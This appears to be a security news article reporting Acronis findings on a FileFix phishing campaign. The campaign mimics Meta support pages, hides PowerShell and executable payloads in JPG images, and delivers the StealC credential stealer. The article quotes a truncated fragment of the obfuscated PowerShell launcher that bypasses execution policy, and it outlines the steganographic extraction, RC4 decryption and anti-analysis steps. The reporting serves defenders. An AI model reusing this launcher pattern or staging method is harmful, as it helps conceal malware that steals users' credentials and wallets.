New Innovative FileFix Attack in The Wild Leverages Steganography to Deliver StealC Malware

A sophisticated cyberthreat campaign has emerged that represents a significant evolution in social engineering attacks, introducing the first real-world implementation of FileFix attack methodology beyond proof-of-concept demonstrations.

This advanced threat leverages steganography techniques to conceal malicious payloads within seemingly innocent JPG images, ultimately delivering the StealC information stealer to compromised systems.

The attack campaign represents a notable departure from traditional ClickFix methodologies, utilizing file upload functionality in HTML to trick victims into executing malicious PowerShell commands through Windows File Explorer address bars.

Unlike conventional approaches that rely on terminal access, this FileFix variant targets the more universally accessible file upload interface, potentially expanding the attack surface to users who may never have opened command-line interfaces.

The threat actors behind this campaign have invested considerable resources in developing a multilingual phishing infrastructure that mimics Facebook security pages across 16 languages, including Arabic, Russian, Hindi, Japanese, Polish, German, Spanish, French, Malay, and Urdu.

The sophisticated social engineering pretext warns victims of imminent account suspension, urging them to access a purported incident report through a fabricated file path that serves as the attack vector.

The phishing site mimics the look of a Meta Help Support page (Source – Acronis)

Acronis researchers identified this campaign as the first sophisticated implementation of FileFix methodology that significantly deviates from the original proof-of-concept developed by researcher Mr. d0x in July 2025.

The attack demonstrates remarkable technical sophistication, incorporating multiple layers of obfuscation, anti-analysis mechanisms, and a complex multistage payload delivery system that sets new standards for evasion techniques in this category of threats.

The campaign’s global reach is evidenced by VirusTotal submissions from multiple countries including the United States, Bangladesh, Philippines, Tunisia, Nepal, Dominican Republic, Serbia, Peru, China, and Germany, suggesting a coordinated international targeting strategy designed to maximize victim exposure across diverse geographic regions.

The attack’s most innovative aspect lies in its sophisticated use of steganography to embed both second-stage PowerShell scripts and encrypted executable payloads within artificially generated landscape images featuring pastoral scenes.

These JPG files, hosted on legitimate platforms like BitBucket, contain malicious code at specific byte indices that are extracted and executed through a carefully orchestrated process.

The initial PowerShell payload employs extensive obfuscation techniques, fragmenting commands into variables and utilizing Base64 encoding to evade pattern-based detection systems.

The command structure demonstrates advanced evasion capabilities:-

PowerShell -noP -W H -ep Bypass -C "$if=[System.IO.File];$ifr=$if::ReadAllBytes;$ifw=$if::WriteAllBytes;$e=[System.Text.Encoding]::UTF8..."

Once executed, the payload downloads the steganographic image to the victim’s temporary directory and extracts the embedded second-stage script from predetermined byte ranges within the file structure.

This secondary script implements RC4 decryption and gzip decompression functions to process the concealed executable payload, which ultimately deploys a Go-based loader equipped with virtual machine detection capabilities and string encryption mechanisms.

The final payload delivers StealC malware, a comprehensive information stealer targeting browser credentials, cryptocurrency wallets, messaging applications, gaming platforms, VPN configurations, and cloud service credentials across popular applications including Chrome, Firefox, Telegram, Discord, various cryptocurrency wallets, and AWS/Azure authentication keys, establishing persistent access for ongoing data exfiltration operations.

Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free